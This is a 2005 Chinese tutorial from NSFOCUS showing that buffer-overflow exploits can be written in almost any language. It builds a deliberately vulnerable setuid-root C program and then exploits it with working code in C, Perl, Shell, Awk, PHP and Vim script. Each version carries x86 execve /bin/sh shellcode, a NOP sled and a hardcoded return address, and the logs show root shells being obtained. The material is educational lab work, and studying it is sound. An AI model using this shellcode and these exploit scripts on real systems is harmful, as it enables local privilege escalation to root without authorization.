溢出利用程序和编程语言大杂烩


    作者:watercloud  <watercloud _at_ nsfocus.com> 出处:http://www.nsfocus.net 日期:2005-04-04 溢出利用程序不仅仅是只能用c语言编写,其实几乎任何编程语言都能用来编写 溢出利用程序,这里用Linux作为试验平台,以实例演示C、Perl、Shell、Awk 语言编写溢出利用程序。之所以选择这几个语言是因为他们都几乎是Unix系统 自带的语言(商用Unix系统中C语言例外)。示例中基本都是把SHELLCODE放到 环境变量中来实现精确定位的。 <一>  有溢出漏洞的vul.c [cloud@test]$ id uid=505(cloud) gid=503(test) groups=503(test) [cloud@test]$ cat vul.c /* Demo    Have a bof vul at argv[1].    Write by watercloud @ xfocus.org */ #include<stdio.h> int main(int argc,char  * argv[]) {         char buff[32];         if(argc > 1)         {                 strcpy(buff,argv[1]);         }         printf("buff : %s/n",buff);         return 0; } [cloud@test]$ gcc vul.c -o vul [cloud@test]$ ls -l vul -rwxr-xr-x    1 cloud    test      11627  2月 24 10:14 vul [cloud@test]$ sudo chown root vul [cloud@test]$ sudo chmod u+s vul [cloud@test]$ ls -lh vul -rwsr-xr-x    1 root     test        11K  2月 24 10:14 vul <二> C语言版本利用程序ex.c [cloud@test]$ cat ex.c /* Demo for exploit bof of "./vul"    Write by watercloud @ xfocus.org */ #include <stdio.h> #define TARGET "./vul" #define ADDR 0xbffff3e8 char SH[]="1/xc0PPP[YZ4/xd0/xcd/x80"           "j/x0bX/x99Rhn/shh//biT[RSTY/xcd/x80"; int main(int argc,char * argv[]) {         char env_buff[4000];         char cmd_buff[1024];         int i,ret;         unsigned int *pi;         char * pc;         for(i=0;i<3096;env_buff[i++]=0x90){ };         env_buff[i]='/0';         strcat(env_buff,SH);         setenv("KK",env_buff,1);         strcpy(cmd_buff,TARGET);         pc=&cmd_buff[strlen(TARGET)];         *pc++=' ';         for(ret=1,i=0;i<4 && ret;i++)         {                 int j;                 *pc++='A';                 pi=(unsigned int *)pc;                 for(j=0;j<20;*pi++=ADDR,j++){};                 *pi=0;                 ret=system(cmd_buff);         }         return ret; } [cloud@test]$ gcc ex.c -o ex [cloud@test]$ ./ex buff : A梵�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?? 梵�胯?? buff : AA梵�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯? 胯?胯?? 
buff : AAA梵�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯? �胯?胯?? buff : AAAA梵�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯 ?胯?胯?? sh-2.05b# id uid=0(root) gid=503(test) groups=503(test) sh-2.05b# exit exit <三> perl语言版本利用程序ex.pl [cloud@test]$ cat ex.pl #!/usr/bin/perl # Demo for exploit bof of "./vul" # Write by watercloud @ xfocus.org #$ENV_LEN=`env |wc -c` $SHELL="1/xc0PPP[YZ4/xd0/xcd/x80j/x0bX/x99Rhn/shh//biT[RSTY/xcd/x80"; $ENV{KK}= "/x90"x 3096 . $SHELL; for($ret=1,$ag="AA",$i=0;$i<4 && $ret; $ag="A"x $i++) {   $ret=system "./vul",$ag. "/xff/xbf/xe8/xf3"x20;  #ADDR:0xbffff3e8 } #EOF [cloud@test]$ perl ex.pl buff : AA�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯 ?胯?胯? sh-2.05b# id uid=0(root) gid=503(test) groups=503(test) sh-2.05b# exit exit <四> Shell语言版本利用程序ex.sh [cloud@test]$ cat ex.sh #/bin/bash # Demo for exploit bof of "./vul" # Write by watercloud @ xfocus.org #ENV_LEN=`env |wc -c|tr -d ' '` SH="1/xc0PPP[YZ4/xd0/xcd/x80j/x0bX/x99Rhn/shh//biT[RSTY/xcd/x80"; AG="AA";for (( i=0;i<10;i++));do AG=$AG$AG;done ;AG=$AG$AG$AG #3096 for((i=0;i<20;i++));do AD=$AD"/xff/xbf/xe8/xf3";done #ADDR:0xbffff3e8 export AGSHELL=$AG`echo -e $SH` for((i=0;i<4;i++)) ;do   AA=$AA"A"   if  ./vul $AA`echo -e $AD`   then break   fi done #EOF [cloud@test]$ chmod a+x ex.sh [cloud@test]$ ./ex.sh buff : A�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯? �胯?胯? ./ex.sh: line 16:  5287 段错误                  ./vul $AA`echo -e $AD` buff : AA�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯 ?胯?胯? 
sh-2.05b# id uid=0(root) gid=503(test) groups=503(test) sh-2.05b# exit exit <五> awk语言版本利用程序ex.awk [cloud@test]$ cat ex.awk # Demo for exploit bof of "./vul" # Write by watercloud @ xfocus.org BEGIN{         SH="1/xc0PPP[YZ4/xd0/xcd/x80j/x0bX/x99Rhn/shh//biT[RSTY/xcd/x80";         AG="AA";         for ( i=0;i<10;i++)         {                 AG=AG""AG;         }         AG=AG""AG""AG #3096         for(i=0;i<20;i++)         {                 AD=AD"/xe8/xf3/xff/xbf"; #ADDR:0xbffff3e8         }         AA="AA"         for(i=0;i<4;i++)         {           AA=AA"A"           system("./vul "AA""AD" "AG""SH)         } } #EOF [cloud@test]$ gawk -f ex.awk /dev/null buff : AAA梵�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?? buff : AAAA梵�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?? sh-2.05b# id uid=0(root) gid=503(test) groups=503(test) sh-2.05b# <六> PHP版本 [cloud@MagicLinux tmp]$ id uid=502(cloud) gid=502(cloud) groups=502(cloud) [cloud@MagicLinux tmp]$ ls -l vul -rwsr-xr-x  1 root root 4895  2月 26 20:57 vul [cloud@MagicLinux tmp]$ cat ex.php <?php $SH="1/xc0PPP[YZ4/xd0/xcd/x80j/x0bX/x99Rhn/shh//biT[RSTY/xcd/x80"; $AG="AA"; for( $i=0;$i<10;$i++){         $AG.=$AG; } $AG.=$AG.$AG; #3096 for($i=0;$i<20;$i++) {         $AD.="/xff/xbf/xe8/xf3";#ADDR:0xbffff3e8 } for($i=0;$i<4;$i++) {   $AA.="A";   print system("./vul ".$AA.$AD.$AG.$SH); } ?> [cloud@MagicLinux tmp]$ php ex.php 1>/dev/null id >&2 uid=0(root) gid=502(cloud) groups=502(cloud) exit [cloud@MagicLinux tmp]$ <七> Vim扩展脚本版本 连vim编辑器的扩展编程脚本也可以拿来写溢出的说: [cloud@MagicLinux tmp]$ id uid=502(cloud) gid=502(cloud) groups=502(cloud) [cloud@MagicLinux tmp]$ cat ex.vim let SH="1/xc0PPP[YZ4/xd0/xcd/x80j/x0bX/x99Rhn/shh//biT[RSTY/xcd/x80" let AG="AA" let i=0 while(i<10)         let AG=AG.AG         let i=i+1 endwhile let AG=AG.AG.AG "len of AG is 3096 let AD="" let i=0 while(i<20)         let AD=AD."/xff/xbf/xe8/xf3" "ADDR:0xbffff3e8         let i=i+1 endwhile let AA="" let i=0 while(i<4)   let AA=AA."A"   execute "!./vul ". AA . AD . AG . 
SH   let i=i+1 endwhile [cloud@MagicLinux tmp]$ ls -l vul -rwsr-xr-x  1 root root 4895  2月 26 20:57 vul [cloud@MagicLinux tmp]$ vim -eS ex.vim Xlib: connection to ":0.0" refused by server Xlib: No protocol specified buff : A�胯�胯�胯�胯�胯�胯�胯�胯�胯�胯�胯�胯�胯�胯�胯�胯�胯�胯�胯�胯驛AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA …………………………………………………………………… AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1繮PP[YZ4型�j                                                                    X橰hn/shh//biT[RSTY蛝 sh-2.05b# id uid=0(root) gid=502(cloud) groups=502(cloud) sh-2.05b# <八> …… <九> 小语    溢出的根本在于地址定位、堆栈等数据结构的使用约定和组织、操作系统运行时结构等。了解这些知识后就会明白,溢出利用本身和编程语言是没有关系的。
